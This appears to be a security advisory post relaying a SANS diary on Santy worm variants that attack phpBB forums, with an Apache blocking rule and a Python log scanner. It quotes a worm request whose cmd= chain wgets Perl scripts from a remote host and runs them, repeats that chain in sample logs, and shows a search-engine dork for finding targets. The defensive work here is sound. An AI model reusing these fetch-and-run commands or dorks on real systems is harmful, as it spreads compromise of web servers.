Santy.b; Santy.c: new variants are being detected and the code made public on k-otik:
from isc.sans.org
We are putting this up early because we have been receiving several reports of a possible Santy variant worm. It is, however, quite different from the original Santy worm.
It tries to pull several scripts from an affected forum (running phpBB). The forum could have been compromised and used as a base to attack others. Here is one of the submissions we received; others are quite similar.
"GET /modules.php?name=http://www.[XXX].net/spy.gif?&cmd=cd%20/tmp;
wget%20www.[XXX].net/spybot.txt;wget%20www.[XXX].net/worm1.txt;
wget%20www.[XXX].net/php.txt;wget%20www.[XXX].net/ownz.txt;
wget%20www.[XXX].net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;
perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 21626 "-" "LWP::Simple/5.803"
You can see that the files pulled include:
spy.gif (which contains a script)
spybot.txt
worm1.txt
php.txt
ownz.txt
zone.txt
worm1.txt is a Perl script which attempts to search Google/Yahoo for vulnerable systems.
$site = "www.google.com";
$procura = "inurl:viewtopic.php?t=$numero";
spybot.txt is another Perl script which attempts to set up an IRC channel on irc.gigachat.net:6667.
From other pieces of logs submitted, the IRC servers seen include:
ssh.gigachat.net
leaf-sunwave.animirc.net
eu.undernet.org
irc.efnet.net
Note that the above filenames change depending on which host it is trying to wget from. Other filenames include:
adfkgnnodfijg
bot
bot.txt
bot.txt.1
dry.scp
ssh.a
terrorbot.txt
terrorbot.txt.1
terrorworm.txt
terrorworm.txt.1
unbot.txt
unbot.txt.1
unbot.txt.2
unbot.txt.3
unworm.txt
unworm.txt.1
unworm.txt.2
unworm.txt.3
worm1.txt
worm.txt
worm.txt.1
One of our readers has blocked this attack with Apache conf directives such as:
# Tag requests whose User-Agent matches the Perl LWP clients seen in the logs
SetEnvIf User-Agent "LWP::" get_lost
SetEnvIf User-Agent "lwp-trivial" get_lost
# Refuse tagged requests to the PHP application directory
<Directory /usr/local/apache/htdocs/your_phpdirectory>
    Order Allow,Deny
    Deny from env=get_lost
    Allow from all
</Directory>
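As an added example (not part of the SANS diary or the reader's configuration), the following Python detects the request pattern quoted above in Apache combined-format access logs by matching the request itself rather than the User-Agent string, and extracts the chained commands and download targets for blocking and cleanup; the sample log lines and the example.net hosts are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format, modelled on the
# submission quoted above; hosts are replaced with example.net placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Dec/2004:12:00:01 +0000] "GET /modules.php?name=http://www.example.net/spy.gif?&cmd=cd%20/tmp;wget%20www.example.net/spybot.txt;wget%20www.example.net/worm1.txt;perl%20spybot.txt;perl%20worm1.txt HTTP/1.1" 200 21626 "-" "LWP::Simple/5.803"
10.0.0.7 - - [26/Dec/2004:12:00:02 +0000] "GET /modules.php?name=News&file=article&sid=12 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.0.0.9 - - [26/Dec/2004:12:00:03 +0000] "GET /viewtopic.php?t=42 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
"""

# Combined log format: client, ident, user, [timestamp], "request", status, bytes, "referer", "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# The signature from the quoted submission: a name= parameter carrying a full URL
# (remote include) combined with a cmd= parameter carrying shell commands.
REMOTE_INCLUDE_RE = re.compile(r'[?&]name=(?P<url>https?://[^&\s]+)', re.I)
CMD_RE = re.compile(r'[?&]cmd=(?P<cmd>[^&\s]+)', re.I)


def analyse(line):
    """Return details of a matching request, or None for benign/unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    inc = REMOTE_INCLUDE_RE.search(rec["path"])
    cmd = CMD_RE.search(rec["path"])
    if not (inc and cmd):
        return None
    # Decode %20 etc. and split the chained shell commands on ';'
    commands = [c.strip() for c in unquote(cmd.group("cmd")).split(";") if c.strip()]
    # Collect what the chain tried to download, for blocking and cleanup
    fetched = [c.split()[-1] for c in commands if c.startswith("wget ")]
    return {"ip": rec["ip"], "ua": rec["ua"], "status": rec["status"],
            "include_url": inc.group("url"), "commands": commands, "fetched": fetched}


def scan(log_text):
    """Run analyse() over every line and keep the hits."""
    return [hit for hit in map(analyse, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["ua"], "fetched:", ", ".join(hit["fetched"]))
```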
K-Otik has published a copy that uses AOL/Yahoo search instead.
See also k-otik.com and k-otik.com Santy.C.